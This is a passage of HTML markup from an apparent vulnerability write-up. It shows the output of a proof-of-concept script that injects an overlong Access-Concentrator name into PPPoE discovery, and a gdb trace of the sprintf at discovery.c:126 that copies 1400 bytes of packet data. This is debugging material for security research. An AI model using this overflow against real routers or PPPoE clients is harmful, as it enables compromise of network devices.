&#8216;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#8217;  INFO     &#8211; waiting for PPPoED PADI&#8230;  &#8230;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc3004999033-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc3004999033-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc3004999033-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc3004999033-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc3004999033-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc3004999033-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc3004999033-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc3004999033-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc3004999033-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc3004999033-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc3004999033-1\"><span class=\"crayon-p\">#&gt; poc.py eth0 <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc3004999033-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc3004999033-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc3004999033-4\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">available <\/span><span class=\"crayon-v\">interfaces<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc3004999033-5\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">lo<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc3004999033-6\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">eth0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc3004999033-7\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">eth1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc3004999033-8\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sniffing <\/span><span class=\"crayon-i\">on<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;eth0&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">trying <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">inject<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc3004999033-9\"><span class=\"crayon-v\">INFO<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">waiting <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PPPoED <\/span><span class=\"crayon-v\">PADI<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc3004999033-10\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0015 seconds] -->  <\/p>\n<p>Step 2: run pppoe-discovery<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58f7e28ed7cc7180932209\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #&gt; gdb &#8211;args .\/pppd\/plugins\/rp-pppoe\/pppoe-discovery -I eth0 -D debug.log  -U -S lol  (gdb) b discovery.c:126  Breakpoint 1 at 0x401508: file discovery.c, line 126.  (gdb) r  Starting program: \/root\/pppp\/ppp\/ppp-2.4.4\/pppd\/plugins\/rp-pppoe\/pppoe-discovery -I eth0 -D debug.log -U -S lol         Service-Name: lol  Got a cookie: 41  Access-Concentrator: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      Breakpoint 1, parsePADOTags (type=&lt;optimized out&gt;, len=1400, data=0x7fffffffdedc &#8216;A&#8217; &lt;repeats 200 times&gt;&#8230;, extra=0x7fffffffde10) at discovery.c:126  126             sprintf(cmd, &#8220;sysevent set wan_pppoe_acname %.*s&#8221;,(int)len, data);  (gdb) bt  #0  parsePADOTags (type=&lt;optimized out&gt;, len=1400, data=0x7fffffffdedc &#8216;A&#8217; &lt;repeats 200 times&gt;&#8230;, extra=0x7fffffffde10) at discovery.c:126  #1  0x0000000000402899 in parsePacket (packet=0x7fffffffdeb0, func=0x401340 &lt;parsePADOTags&gt;, extra=0x7fffffffde10) at common.c:82  #2  0x0000000000401d3b in waitForPADO (conn=0x605010, timeout=2147482226, timeout@entry=5) at discovery.c:388  #3  0x00000000004023c0 in discovery (conn=conn@entry=0x605010) at discovery.c:629  #4  0x00000000004010d4 in main (argc=8, argv=0x7fffffffe5f8) at pppoe-discovery.c:83<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc7180932209-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc7180932209-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc7180932209-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc7180932209-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc7180932209-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc7180932209-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc7180932209-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc7180932209-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc7180932209-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc7180932209-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc7180932209-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc7180932209-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc7180932209-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc7180932209-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc7180932209-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc7180932209-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58f7e28ed7cc7180932209-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58f7e28ed7cc7180932209-18\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc7180932209-1\"><span class=\"crayon-p\">#&gt; gdb &#8211;args .\/pppd\/plugins\/rp-pppoe\/pppoe-discovery -I eth0 -D debug.log&nbsp;&nbsp;-U -S lol<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc7180932209-2\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">discovery<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">126<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc7180932209-3\"><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x401508<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file <\/span><span class=\"crayon-v\">discovery<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">line<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">126.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc7180932209-4\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">r<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc7180932209-5\"><span class=\"crayon-e\">Starting <\/span><span class=\"crayon-v\">program<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pppp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ppp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.4.4<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pppd<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">plugins<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">rp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">pppoe<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pppoe<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">discovery<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">I<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">eth0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">D<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">debug<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">U<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">S<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">lol<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc7180932209-6\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">Service<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Name<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">lol<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc7180932209-7\"><span class=\"crayon-i\">Got<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">41<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc7180932209-8\"><span class=\"crayon-v\">Access<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Concentrator<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc7180932209-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc7180932209-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58f7e28ed7cc7180932209-11\"><span class=\"crayon-i\">Breakpoint<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">parsePADOTags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">optimized <\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1400<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x7fffffffdedc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">extra<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x7fffffffde10<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-v\">discovery<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">126<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58f7e28ed7cc7180932209-12\"><span class=\"crayon-cn\">126<\/span><span 